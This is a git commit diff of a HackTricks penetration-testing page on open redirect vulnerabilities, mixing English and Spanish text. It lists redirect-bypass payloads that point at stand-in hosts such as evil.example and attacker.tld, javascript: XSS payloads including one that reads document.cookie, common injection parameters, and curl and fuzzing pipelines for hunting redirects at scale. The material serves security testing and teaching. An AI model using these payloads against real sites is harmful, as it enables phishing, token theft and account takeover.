Translated ['src/pentesting-web/open-redirect.md'] to es

This commit is contained in:
Translator 2025-10-01 15:26:20 +00:00
parent 89b3c7d386
commit 8c441ed615

View File

@ -1,18 +1,29 @@
# Redirección Abierta
# Open Redirect
{{#include ../banners/hacktricks-training.md}}
## Redirección Abierta
## Open redirect
### Redirección a localhost o dominios arbitrarios
### Redirect to localhost or arbitrary domains
- Si la app “allows only internal/whitelisted hosts”, prueba notaciones alternativas de host para alcanzar loopback o rangos internos vía el redirect target:
- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
- Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
- Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Estos son útiles cuando solo se permiten “subdomains of X” pero la resolución del host sigue apuntando a 127.0.0.1.
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
- https://trusted.tld@attacker.tld/ → el navegador navega a attacker.tld pero simples comprobaciones de cadena “ven” trusted.tld.
- Backslash parsing confusion between frameworks/browsers:
- https://trusted.tld\@attacker.tld → algunos backends tratan “\” como un caracter de path y pasan la validación; browsers normalizan a “/” e interpretan trusted.tld como userinfo, enviando usuarios a attacker.tld. Esto también aparece en mismatches de Node/PHP URL-parser.
{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}
### Redirección Abierta a XSS
### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Open Redirect subiendo archivos svg
<details>
<summary>Payloads modernos de bypass basados en URL</summary>
```text
# Scheme-relative (current scheme is reused)
//evil.example
# Credentials (userinfo) trick
https://trusted.example@evil.example/
# Backslash confusion (server validates, browser normalizes)
https://trusted.example\@evil.example/
# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example
# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example
# When only path is accepted, try breaking absolute URL detection
/\\evil.example
/..//evil.example
```
```
</details>
## Open Redirect uploading svg files
```html
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## Parámetros de inyección comunes
## Common injection parameters
```
/{payload}
?next={payload}
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
## Ejemplos de código
## Code examples
#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
#### PHP
```php
<?php
/* browser redirections*/
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
exit;
?>
```
## Hunting and exploitation workflow (practical)
- Single URL check with curl:
```bash
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
```
- Discover and fuzz likely parameters at scale:
<details>
<summary>Click to expand</summary>
```bash
# 1) Recopila URLs históricas, conserva aquellas con parámetros comunes de redirección
cat domains.txt \
| gau --o urls.txt # or: waybackurls / katana / hakrawler
# 2) Grep parámetros comunes y normaliza la lista
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
| sed 's/\r$//' | sort -u > candidates.txt
# 3) Usa OpenRedireX para fuzz con un corpus de payloads
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
# 4) Verifica manualmente los resultados interesantes
awk '/30[1237]|Location:/I' results.txt
```
```
</details>
- No olvides los sinks del lado cliente en SPAs: busca window.location/assign/replace y los helpers del framework que leen query/hash y redirigen.
- Los frameworks a menudo introducen footguns cuando los destinos de redirección se derivan de input no confiable (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
{{#ref}}
../network-services-pentesting/pentesting-web/nextjs.md
{{#endref}}
- OAuth/OIDC flows: abusar de open redirectors frecuentemente escala a account takeover por leaking de authorization codes/tokens. Consulta la guía dedicada:
{{#ref}}
./oauth-to-account-takeover.md
{{#endref}}
- Las respuestas del servidor que implementan redirects sin Location (meta refresh/JavaScript) siguen siendo explotables para phishing y a veces pueden encadenarse. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>
```
## Herramientas
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
- OpenRedireX fuzzer para detectar open redirects. Ejemplo:
```bash
# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
## Recursos
# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
```
## Referencias
- En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.
- En https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puedes encontrar listas de fuzzing.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
- PortSwigger Web Security Academy DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
- OpenRedireX Un fuzzer para detectar open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
{{#include ../banners/hacktricks-training.md}}